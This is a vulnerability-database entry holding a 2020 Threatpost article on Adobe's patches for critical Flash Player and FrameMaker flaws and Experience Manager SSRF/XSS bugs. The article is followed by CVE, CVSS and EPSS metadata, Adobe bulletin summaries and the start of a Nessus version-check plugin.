DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:7DD942EAC02CBA0F656CD33B15174F40", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Adobe Warns of Critical Flaws in Flash Player, Framemaker", "description": "Adobe released patches for four critical flaws in Flash Player and in its Framemaker document processor as part of its regularly scheduled updates. The bugs, if exploited, could enable arbitrary code-execution.\n\nIn Tuesday\u2019s June Adobe security updates, critical flaws tied to three CVEs were patched in Adobe Framemaker, which is Adobe\u2019s application designed for writing and editing large or complex documents.\n\nThe flaws include two critical out-of-bounds write flaws ([CVE-2020-9634](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9634>), [CVE-2020-9635](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9635>)), which stem from write operations that then produce undefined or unexpected results. Francis Provencher working with Trend Micro\u2019s Zero Day Initiative (ZDI) was credited with finding these arbitrary code-execution flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDustin Childs, communications manager with Trend Micro\u2019s ZDI, told Threatpost that an attacker can leverage both flaws to execute code in the context of the current process. They would need to entice a user to open a specially crafted file or visit a malicious page, he said.\n\n\u201cFor CVE-2020-9634, the specific flaw exists within the parsing of GIF files,\u201d Childs told Threatpost. \u201cThe issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. For CVE-2020-9635, the specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write before the start of an allocated object.\u201d\n\nAdobe also patched a critical bug (CVE-2020-9636) stemming from memory corruption, where an attempt is made to access memory after it has been freed. This can cause an array of malicious impacts, from causing a program to crash, to potentially leading to execution of arbitrary code \u2013 or even enabling full remote code-execution capabilities. Honggang Ren of Fortinet\u2019s FortiGuard Labs reported the flaw.\n\nAdobe Framemaker versions 2019.0.5 and below for Windows are affected; fixes are available in version 2019.0.6.\n\n## **Flash Player **\n\nA critical, use-after-free flaw ([CVE-2020-9633](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9633>)) was meanwhile discovered in Flash Player. Affected are Adobe Flash Player Desktop Runtime (Windows, macOS and Linux), Adobe Flash Player for Google Chrome (Windows, macOS, Linux and Chrome OS) and for Microsoft Edge/Internet Explorer 11 (Windows 10 and 8.1), all for versions 32.0.0.330 and earlier.\n\nImpacted users are urged to update to 32.0.0.387 in a \u201cpriority 2\u201d update, which according to Adobe \u201cresolves vulnerabilities in a product that has historically been at elevated risk,\u201d but for which there are currently no known exploits.\n\n\u201cSuccessful exploitation could lead to arbitrary code-execution in the context of the current user,\u201d said [Adobe in its update](<https://helpx.adobe.com/security/products/flash-player/apsb20-30.html>).\n\nFlash is known to be a favorite target for cyberattacks, particularly for exploit kits, [zero-day attacks](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) and phishing schemes. Of note, [Adobe announced in July 2017](<https://threatpost.com/patched-flash-player-sandbox-escape-leaked-windows-credentials/127378/>) that it plans to push Flash into an end-of-life state, meaning that it will no longer update or distribute Flash Player at the end of this year.\n\n## **Other Flaws**\n\nAdobe also patched flaws tied [to six important-severity flaws](<https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html>) in Experience Manager, its content management platform for building websites, mobile apps and forms. Versions 6.5 and earlier are affected.\n\nThese include server-side request forgery glitches ([CVE-2020-9643](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9643>) and CVE-2020-9645) that could allow sensitive information disclosure, and cross-site scripting vulnerabilities (CVE-2020-9647, [CVE-2020-9648](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9648>), CVE-2020-9651 and [CVE-2020-9644](<https://attackerkb.com/topics/Xr9Uh2Tx13/cve-2020-9644>)) that could enable arbitrary JavaScript execution in the browser.\n\nFor all flaws in its June update, Adobe said it is not aware of any exploits in the wild. The regularly scheduled updates come a month after Adobe [fixed 16 critical flaws](<https://threatpost.com/adobe-kills-16-critical-flaws-in-acrobat-and-reader-digital-negative-sdk/155652/>) across its Acrobat and Reader applications and its Adobe Digital Negative (DNG) Software Development Kit in May. If exploited, those flaws could lead to remote code execution.\n\nIn May, Adobe also issued an [out-of-band patch for](<https://threatpost.com/adobe-patches-critical-rce-flaw-character-animator/155882/>) a critical flaw in Adobe Character Animator, its application for creating live motion-capture animation videos. The flaw can be exploited by a remote attacker to execute code on affected systems.\n", "published": "2020-06-09T15:27:28", "modified": "2020-06-09T15:27:28", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/", "reporter": "Lindsey O'Donnell", "references": ["https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9634", "https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9635", "https://threatpost.com/newsletter-sign/", "https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9633", "https://helpx.adobe.com/security/products/flash-player/apsb20-30.html", "https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/", "https://threatpost.com/patched-flash-player-sandbox-escape-leaked-windows-credentials/127378/", "https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html", "https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9643", "https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9648", "https://attackerkb.com/topics/Xr9Uh2Tx13/cve-2020-9644", "https://threatpost.com/adobe-kills-16-critical-flaws-in-acrobat-and-reader-digital-negative-sdk/155652/", "https://threatpost.com/adobe-patches-critical-rce-flaw-character-animator/155882/"], "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9633", "CVE-2020-9634", "CVE-2020-9635", "CVE-2020-9636", "CVE-2020-9643", "CVE-2020-9644", "CVE-2020-9645", "CVE-2020-9647", "CVE-2020-9648", "CVE-2020-9651"], "immutableFields": [], "lastseen": "2020-10-16T22:35:47", "viewCount": 78, "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSB20-30", "APSB20-31", "APSB20-32", "APSB20-59"]}, {"type": "cve", "idList": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9633", "CVE-2020-9634", "CVE-2020-9635", "CVE-2020-9636", "CVE-2020-9643", "CVE-2020-9644", "CVE-2020-9645", "CVE-2020-9647", "CVE-2020-9648", "CVE-2020-9651"]}, {"type": "freebsd", "idList": ["196B31B8-AA9A-11EA-A59A-6451062F0F7A"]}, {"type": "gentoo", "idList": ["GLSA-202006-09"]}, {"type": "mageia", "idList": ["MGASA-2020-0264"]}, {"type": "mscve", "idList": ["MS:ADV200010"]}, {"type": "nessus", "idList": ["ADOBE_EXPERIENCE_MANAGER_APSB20-31.NASL", "ADOBE_FRAMEMAKER_APSB20-32.NASL", "FLASH_PLAYER_APSB20-30.NASL", "FREEBSD_PKG_196B31B8AA9A11EAA59A6451062F0F7A.NASL", "GENTOO_GLSA-202006-09.NASL", "MACOSX_FLASH_PLAYER_APSB20-30.NASL", "REDHAT-RHSA-2020-2547.NASL", "SMB_NT_MS20_JUN_FLASH.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817149", "OPENVAS:1361412562310817150", "OPENVAS:1361412562310817151", "OPENVAS:1361412562310817152", "OPENVAS:1361412562310817153", "OPENVAS:1361412562310817154", "OPENVAS:1361412562310817155"]}, {"type": "redhat", "idList": ["RHSA-2020:2547"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-9633"]}, {"type": "thn", "idList": ["THN:882595A940E5AB15E8B9C472154ACA45"]}, {"type": "threatpost", "idList": ["THREATPOST:00F7DE33B40C4ED287762FBA680EB607", "THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "THREATPOST:023426685093FC21F8E5A7DE88AAB901", "THREATPOST:033645C929899D29D91092278D188D8E", "THREATPOST:0520B21C32AEF3BA1666DAFAA427792E", "THREATPOST:0675FD2F1907119072EAFF965E2B7E2C", "THREATPOST:07CDA6601F0919DC6946C150BBBE8900", "THREATPOST:0AF6471C8950B312AA2DB603A5C2F82F", "THREATPOST:0C6C445BFBCD8AD47CA5B91A506DB09E", "THREATPOST:137B556D777466139D73B0ECF97E4E32", "THREATPOST:14236108003AC6A3E1AB861A15ECA88F", "THREATPOST:15D2E9F142FD01B0FB329D7E3179F0E4", "THREATPOST:16E580ECF9CBAD8F883D6241A7754060", "THREATPOST:197A12EF32429D29CF6A84B11763834D", "THREATPOST:1ACF78FAC848A424ADE5DEE520B43051", "THREATPOST:20ECC314C8122C21B6B0C611C14F1A13", "THREATPOST:2334EE5F6C03FC3ECE377B9BD44BA4E7", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:245021185706E94E1CA436608011DDB2", "THREATPOST:2599160F787BE161604E8BC2847A6643", "THREATPOST:26D5939EFE0BD9FACA470F9A3D547398", "THREATPOST:2DF088ED0B48BE31C97E898391B83566", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:3DD752D9BB64796659DC752DBB658DF2", "THREATPOST:3F0E45B1EBB975331C1ED9FCA486E4BE", "THREATPOST:40065E8C90768C4FEA330195000FA7DB", "THREATPOST:400B0D790B8223A5A004460CD9A927B4", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:4F15F64975E3F5BE228AE0A72697EE31", "THREATPOST:50210848F5C0B6804DBF8A398FD41F24", "THREATPOST:507909D943303F221572F2B4F6F0CCAC", "THREATPOST:525BDFF0E0C4D33D5E543DA8234EA30B", "THREATPOST:5411DD62D790E8DA914441FC7BFE1358", "THREATPOST:54A5A39D65B32844C215D89668BFB79D", "THREATPOST:54F790259E54FB2B08B5ABB20B033701", "THREATPOST:5548F4E3E237D384BA67561D3FCBB730", "THREATPOST:5B34B9C962E93AFAD432CA452F1AA316", "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "THREATPOST:5CC822A4BF6A56A9ECF6777E5BB63A56", "THREATPOST:5D03069AA1C13F3368E88C9D30D3CC23", "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "THREATPOST:62D348CF6DAF40D6FBCD313A3BCEDBF9", "THREATPOST:63A5AF6DBA80B1406297BB5825D56E32", "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "THREATPOST:66B6758B39EA6566B84928992AF3085C", "THREATPOST:679F2DF40CC550D00CE4C3E33EFE7496", "THREATPOST:694A3BE8CD7B0AD2CFE4B7CB47818F4A", "THREATPOST:718E4F36F0096BBE66CB2FAE28048810", "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "THREATPOST:74D46F285623FE008F8AABA5323341D4", "THREATPOST:75F9985EEED2523C6C65016DB1C5630A", "THREATPOST:76BC8D329A74BD12883D2CEFFA552A54", "THREATPOST:785BBBEDA09A3CE4F8ACBCFA48B51AD2", "THREATPOST:7AC4B0C651D6878D3018F86B8B25E4C6", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "THREATPOST:81EBB25A8E63A83670A070DD550D9644", "THREATPOST:8207D062CD4838B19CB8398D9259D2CC", "THREATPOST:8A8E859062970130E3F91D160F03325C", "THREATPOST:91752358A60874F9C9D448BB279A8192", "THREATPOST:91C088C13F7384C96414B2C00FAF909B", "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "THREATPOST:935FDBA342DDD020D66B791DBE0AEA4D", "THREATPOST:972202A633AD7E38B95647F050D95060", "THREATPOST:9BCA61EE1DC2B7F4CCAA9D127D46DBA4", "THREATPOST:9C49BCB0388D167E73DA96F633225C8F", "THREATPOST:9E04149817EE094AADC1268A47208E10", "THREATPOST:A105AF0012294477B203EA2AFD1BCE82", "THREATPOST:A30E6A4920ABDF2ACEDA56240984C9FD", "THREATPOST:A6991C9080305907C0352031B295B40D", "THREATPOST:A6F20078C61A1ED9A10E74F884FF3436", "THREATPOST:A8F8FF80F526883F7B2F0AB15005FF18", "THREATPOST:A9A57AE690BD069DB9BBA2CD154B315F", "THREATPOST:AA1F3088D813F95D476A024378F27010", "THREATPOST:AA9A188D2A788AE1631B96AE8B73AA3A", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AF48B7955116E7E79CD8F432216C960A", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "THREATPOST:BBFD6EC28ECCF701431C5F4A518DC1B5", "THREATPOST:C03DD9A2C40C92B2269F8066649A75ED", "THREATPOST:C22F1F8B7AB3041436E903528767C174", "THREATPOST:C51D2F2366676BB018956D93916AC33E", "THREATPOST:C7447BBBEA06E3A901BB1A9A66AB85FF", "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "THREATPOST:CB31619614FD5E23CA0F7DEC57D992BE", "THREATPOST:CFF3DDE464C215A7BDD3772ADFCDA4EE", "THREATPOST:D000B56E417D094837C498C6A759A338", "THREATPOST:D002CB7A00429994A6A05F968060A826", "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "THREATPOST:D1DDBC944E33F3C1BB8815964C2B9E2B", "THREATPOST:D2E35B61D2D9455A00F50AC6B8A5A129", "THREATPOST:D42DD8800FBF76F5AEC0B4FB1AE577EA", "THREATPOST:D7E85EFA2708BCF8E9777438F3726A49", "THREATPOST:DBAD84DFBF09E2C28414A18721E5CA90", "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:E07387431E59AD0A09420F7EFA295856", "THREATPOST:E8A45942B4C8BC03FF0C464DB57C713C", "THREATPOST:E9212954E31E4447FD755C9E210A641F", "THREATPOST:EABA151827AA14E6292386F02B5ED8A1", "THREATPOST:EC00DBD1B5F3C10C2DB3271A9666C8FE", "THREATPOST:ED2B1571104341CFA35DF2C4172EB792", "THREATPOST:EDFFF959759E1951E67CA4BC4A8FAF1E", "THREATPOST:EF0075FFF210E542FF3ECB996DDA02A3", "THREATPOST:EFC814A6564326F98824AC875F125E0D", "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "THREATPOST:F28EA4089C930D0CA97E01E5F5BAC88B", "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "THREATPOST:F334DD851AFA845C7A29CB75F55E8128", "THREATPOST:F45A1AEACEC0BF32FC6CDCECDF2B458D", "THREATPOST:F547DC4A5DD1A7B486FE5B2CBD69648A", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F601825CA049E15E130F5026708E5DC5", "THREATPOST:F7D65957C604C7659052B9B15947A826", "THREATPOST:FB2955E1812C33ECF441EDAEC41F4022", "THREATPOST:FB3A73274A678D5DA8D5263B9E1A1DA1", "THREATPOST:FC124FCB1BDB55D5A63163F8F4720021", "THREATPOST:FC2AB9DBD639AEF3E55048C4BBCFC321", "THREATPOST:FE1BBBDAB06CCA2534A051537BC5CC73"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-9633"]}, {"type": "zdi", "idList": ["ZDI-20-699", "ZDI-20-700"]}, {"type": "zdt", "idList": ["1337DAY-ID-36026"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "adobe", "idList": ["APSB20-30", "APSB20-31", "APSB20-32", "APSB20-59"]}, {"type": "cve", "idList": ["CVE-2020-9633", "CVE-2020-9634", "CVE-2020-9635", "CVE-2020-9636", "CVE-2020-9643", "CVE-2020-9644", "CVE-2020-9645", "CVE-2020-9647", "CVE-2020-9648", "CVE-2020-9651"]}, {"type": "freebsd", "idList": ["196B31B8-AA9A-11EA-A59A-6451062F0F7A"]}, {"type": "gentoo", "idList": ["GLSA-202006-09"]}, {"type": "mscve", "idList": ["MS:ADV200010"]}, {"type": "nessus", "idList": ["ADOBE_EXPERIENCE_MANAGER_APSB20-31.NASL", "ADOBE_FRAMEMAKER_APSB20-32.NASL", "FLASH_PLAYER_APSB20-30.NASL", "FREEBSD_PKG_196B31B8AA9A11EAA59A6451062F0F7A.NASL", "MACOSX_FLASH_PLAYER_APSB20-30.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817149", "OPENVAS:1361412562310817150", "OPENVAS:1361412562310817151", "OPENVAS:1361412562310817152", "OPENVAS:1361412562310817153", "OPENVAS:1361412562310817154", "OPENVAS:1361412562310817155"]}, {"type": "redhat", "idList": ["RHSA-2020:2547"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-9633"]}, {"type": "thn", "idList": ["THN:882595A940E5AB15E8B9C472154ACA45"]}, {"type": "threatpost", "idList": ["THREATPOST:0EA1744AE6DC3132EC22B6EE7A442C2E", "THREATPOST:20ECC314C8122C21B6B0C611C14F1A13", "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "THREATPOST:75F9985EEED2523C6C65016DB1C5630A", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "THREATPOST:EF0075FFF210E542FF3ECB996DDA02A3", "THREATPOST:F547DC4A5DD1A7B486FE5B2CBD69648A"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-9633"]}, {"type": "zdi", "idList": ["ZDI-20-699", "ZDI-20-700"]}, {"type": "zdt", "idList": ["1337DAY-ID-36026"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-24400", "epss": "0.000630000", "percentile": "0.248630000", "modified": "2023-03-15"}, {"cve": "CVE-2020-24407", "epss": "0.000850000", "percentile": "0.344270000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9633", "epss": "0.038980000", "percentile": "0.905610000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9634", "epss": "0.005940000", "percentile": "0.750340000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9635", "epss": "0.005940000", "percentile": "0.750340000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9636", "epss": "0.003730000", "percentile": "0.684130000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9643", "epss": "0.001990000", "percentile": "0.560690000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9644", "epss": "0.000590000", "percentile": "0.226870000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9645", "epss": "0.001990000", "percentile": "0.560690000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9647", "epss": "0.000860000", "percentile": "0.347770000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9648", "epss": "0.000860000", "percentile": "0.347770000", "modified": "2023-03-15"}, {"cve": "CVE-2020-9651", "epss": "0.000860000", "percentile": "0.347770000", "modified": "2023-03-15"}], "vulnersScore": 0.3}, "_state": {"dependencies": 1678918916, "score": 1684000741, "epss": 1678948511}, "_internal": {"score_hash": "fc24a7e209a69130523cd949775427a9"}}

{"adobe": [{"lastseen": "2023-06-06T15:46:13", "description": "Adobe has released updates for Adobe Experience Manager (AEM). These updates resolve vulnerabilities in AEM versions 6.5 and below rated [Important](). Successful exploitation could result in sensitive information disclosure. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-09T00:00:00", "type": "adobe", "title": "APSB20-31 Security update available for Adobe Experience Manager", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9643", "CVE-2020-9644", "CVE-2020-9645", "CVE-2020-9647", "CVE-2020-9648", "CVE-2020-9651"], "modified": "2020-06-09T00:00:00", "id": "APSB20-31", "href": "https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T15:46:18", "description": "Adobe has released a security update for Adobe Framemaker. This update addresses multiple [critical]() vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "adobe", "title": "APSB20-32 Security Updates Available for Adobe Framemaker", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9634", "CVE-2020-9635", "CVE-2020-9636"], "modified": "2020-06-09T00:00:00", "id": "APSB20-32", "href": "https://helpx.adobe.com/security/products/framemaker/apsb20-32.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:46:25", "description": "Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address a [critical]() vulnerability in Adobe Flash Player. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "adobe", "title": "APSB20-30 Security updates available for Adobe Flash Player", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9633"], "modified": "2020-06-09T00:00:00", "id": "APSB20-30", "href": "https://helpx.adobe.com/security/products/flash-player/apsb20-30.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:46:55", "description": "Magento has released updates for Magento Commerce and Magento Open Source. These updates resolve vulnerabilities rated [important]() and [critical](). Successful exploitation could lead to arbitrary code execution. \n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-15T00:00:00", "type": "adobe", "title": "APSB20-59 Security\u202fupdates available\u202ffor Magento", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24400", "CVE-2020-24401", "CVE-2020-24402", "CVE-2020-24403", "CVE-2020-24404", "CVE-2020-24405", "CVE-2020-24406", "CVE-2020-24407", "CVE-2020-24408"], "modified": "2020-10-15T00:00:00", "id": "APSB20-59", "href": "https://helpx.adobe.com/security/products/magento/apsb20-59.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:02:59", "description": "The version of Adobe Experience Manager installed on the remote host is 6.1.x, 6.2.x, 6.3.x, 6.4.x prior to 6.4.8.1, or 6.5.x prior to 6.5.5.0. It is, therefore, affected by multiple vulnerabilities:\n\n - An unspecified server-side request forgery (SSRF) that could result in sensitive information disclosure (CVE-2020-9643)\n\n - An unspecified cross-site scripting vulnerability that could result in arbitrary javaScript execution (CVE-2020-9644, CVE-2020-9647, CVE-2020-9648, CVE-2020-9651)\n\n - An unspecified blind server-side request forgery that could result sensitive information disclosure (CVE-2020-9645)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. To retrieve patch level information, this plugin requires the HTTP credentials of the web console. For accurate results, you may need to enable the Adobe Experience Manager ports (by default, 4502 and/or 4503) in your Nessus scan.", "cvss3": {}, "published": "2020-06-12T00:00:00", "type": "nessus", "title": "Adobe Experience Manager 6.1.x < 6.4.8.1 / 6.5.x < 6.5.5.0 (APSB20-31)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9643", "CVE-2020-9644", "CVE-2020-9645", "CVE-2020-9647", "CVE-2020-9648", "CVE-2020-9651"], "modified": "2020-09-15T00:00:00", "cpe": ["cpe:/a:adobe:experience_manager"], "id": "ADOBE_EXPERIENCE_MANAGER_APSB20-31.NASL", "href": "https://www.tenable.com/plugins/nessus/137367", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137367);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/15\");\n\n script_cve_id(\n \"CVE-2020-9643\",\n \"CVE-2020-9644\",\n \"CVE-2020-9645\",\n \"CVE-2020-9647\",\n \"CVE-2020-9648\",\n \"CVE-2020-9651\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0253-S\");\n\n script_name(english:\"Adobe Experience Manager 6.1.x < 6.4.8.1 / 6.5.x < 6.5.5.0 (APSB20-31)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Adobe Experience Manager installed on the remote host is affected by multiple vulnerabilities (APSB20-31)\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Experience Manager installed on the remote host is 6.1.x, 6.2.x, 6.3.x, 6.4.x prior to 6.4.8.1, \nor 6.5.x prior to 6.5.5.0. It is, therefore, affected by multiple vulnerabilities:\n\n - An unspecified server-side request forgery (SSRF) that\n could result in sensitive information disclosure \n (CVE-2020-9643)\n\n - An unspecified cross-site scripting vulnerability that\n could result in arbitrary javaScript execution \n (CVE-2020-9644, CVE-2020-9647, CVE-2020-9648, CVE-2020-9651)\n\n - An unspecified blind server-side request forgery that\n could result sensitive information disclosure \n (CVE-2020-9645)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber. To retrieve patch level information, this plugin requires the HTTP credentials of the web console. For accurate\nresults, you may need to enable the Adobe Experience Manager ports (by default, 4502 and/or 4503) in your Nessus\nscan.\");\n # https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22dc4755\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the recommended update from the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9643\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n 